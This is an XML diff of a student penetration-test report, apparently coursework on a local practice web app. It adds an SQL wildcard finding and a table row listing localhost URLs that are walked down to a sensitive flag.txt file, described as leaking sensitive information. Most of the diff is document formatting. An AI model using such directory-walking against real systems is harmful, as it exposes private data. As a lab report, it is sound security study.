+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the response changes.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E78C02" wp14:editId="41C3D46C">
-                  <wp:extent cx="2127013" cy="1101219"/>
-                  <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
-                  <wp:docPr id="10" name="Picture 10"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6F4B65" wp14:editId="08674FF3">
+                  <wp:extent cx="2366760" cy="371436"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="3" name="Picture 3"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -14675,11 +14963,11 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="10" name="Picture 10"/>
+                          <pic:cNvPr id="1" name=""/>
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14687,7 +14975,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2149725" cy="1112978"/>
+                            <a:ext cx="2483796" cy="389803"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -14700,6 +14988,207 @@
               </w:drawing>
             </w:r>
           </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4581" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>documents</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>random</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/flag.txt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Traverse every directory and eventually we leak out the sensitive information:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="296A971F" wp14:editId="5C387670">
+                  <wp:extent cx="2200506" cy="772090"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="9" name="Picture 9"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="9" name="Picture 9"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2257757" cy="792178"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
@@ -14711,8 +15200,8 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId21"/>
-      <w:footerReference w:type="first" r:id="rId22"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:footerReference w:type="first" r:id="rId25"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -15452,6 +15941,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="555A35FF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="812846B0"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64212354"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="321EF54A"/>
@@ -15537,7 +16112,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6523477E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FA1E1858"/>
@@ -15623,7 +16198,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="65B93A87"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="25605A66"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="668D7AC4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0CC4FA40"/>
@@ -15709,7 +16370,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7BF527B8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="156AF4C4"/>
+    <w:lvl w:ilvl="0" w:tplc="6264F150">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D3F1F08"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="880E24E4"/>
@@ -15808,7 +16558,7 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="4"/>
@@ -15823,13 +16573,22 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="10">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="11">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="11">
-    <w:abstractNumId w:val="8"/>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="13">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="14">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>

</xml_diff>

<commit_message>
Add SQL wildcard attack vulnerability detailed finding
</commit_message>
<xml_diff>
--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -261,7 +261,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc71393713"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71399616"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -862,31 +862,53 @@
         </w:rPr>
         <w:t>and serious damage to the business reputation and they have to be mitigated before release.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve"> As for t</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>he low-risk vulnerability</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">The low-risk vulnerability, SQL wildcard attack, can be fixed along with the SQL injection. The medium-risk vulnerability, depending on the deadline and budgetary constraints, </w:t>
+        <w:t xml:space="preserve"> –</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>can be mitigated optionally with proper warnings displayed.</w:t>
+        <w:t xml:space="preserve"> SQL wildcard attack, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>either be fixed or left out as no unintended information can be leaked from there</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -952,7 +974,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71393713" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399616" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -979,7 +1001,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393713 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399616 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1024,7 +1046,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393714" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399617" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1051,7 +1073,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393714 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399617 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1096,7 +1118,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393715" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399618" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1123,7 +1145,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393715 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399618 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1168,7 +1190,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393716" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399619" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1203,7 +1225,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393716 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399619 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1248,7 +1270,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393717" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399620" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1276,7 +1298,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393717 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399620 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1321,7 +1343,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393718" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399621" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1349,7 +1371,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393718 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399621 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1394,7 +1416,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393719" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399622" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1422,7 +1444,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393719 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399622 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1467,7 +1489,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393720" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399623" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1495,7 +1517,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393720 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399623 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1540,7 +1562,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393721" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399624" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1568,7 +1590,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393721 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399624 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1613,7 +1635,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393722" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399625" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1641,7 +1663,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393722 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399625 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1686,7 +1708,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393723" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399626" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1714,7 +1736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
